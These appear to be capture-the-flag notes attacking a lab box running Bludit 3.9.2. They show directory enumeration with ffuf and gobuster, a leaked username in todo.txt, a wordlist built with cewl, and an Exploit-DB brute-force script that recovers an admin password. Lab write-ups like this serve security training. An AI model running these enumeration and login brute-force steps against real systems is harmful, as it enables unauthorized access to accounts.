2 :80
ffuf
cgi-bin/ [Status: 301, Size: 0, Words: 1, Lines: 1]
LICENSE [Status: 200, Size: 1083, Words: 155, Lines: 22]
robots.txt [Status: 200, Size: 22, Words: 3, Lines: 2]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
$ gobuster dir -u 10.10.10.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,txt,html
===============================================================
2021/06/16 12:05:30 Starting gobuster in directory enumeration mode
===============================================================
/about (Status: 200) [Size: 3281]
/0 (Status: 200) [Size: 7562]
/admin (Status: 301) [Size: 0] [--> http://10.10.10.191/admin/]
/install.php (Status: 200) [Size: 30]
/todo.txt (Status: 200) [Size: 118]
/usb (Status: 200) [Size: 3960]
http://10.10.10.191/todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
$ gobuster dir -u http://10.10.10.191 -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100
/.gitignore (Status: 200) [Size: 563]
http://10.10.10.191/robots.txt
User-agent: *
Allow: /
http://10.10.10.191/install.php
Bludit is already installed ;)
http://10.10.10.191/admin/
Bludit login page
http://10.10.10.191/.gitignore
.DS_Store
dbgenerator.php
bl-content/*
bl-content-migrator
bl-plugins/timemachine
bl-plugins/timemachine-x
bl-plugins/discovery
bl-plugins/updater
bl-plugins/medium-editor
bl-plugins/quill
bl-plugins/yandex-metrica/
bl-plugins/domain-migrator/
bl-plugins/tail-writer/
bl-kernel/bludit.pro.php
bl-kernel/admin/themes/gris
bl-themes/docs
bl-themes/docsx
bl-themes/editorial
bl-themes/mediumish
bl-themes/clean-blog
bl-themes/grayscale
bl-themes/massively
bl-themes/hyperspace
bl-themes/striped
bl-themes/log
bl-themes/micro
bl-themes/tagg
bl-themes/future-imperfect
Found the Bludit version (3.9.2) in the page source:
<!-- Include Bootstrap CSS file bootstrap.css -->
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2">
Using https://www.exploit-db.com/exploits/48942
$ echo "fergus" > user.txt
$ cewl http://10.10.10.191 -w pass.txt
$ python3 48942.py -l http://10.10.10.191/admin/login.php -u user.txt -p pass.txt
[*] SUCCESS !!
[+] Use Credential -> fergus:RolandDeschain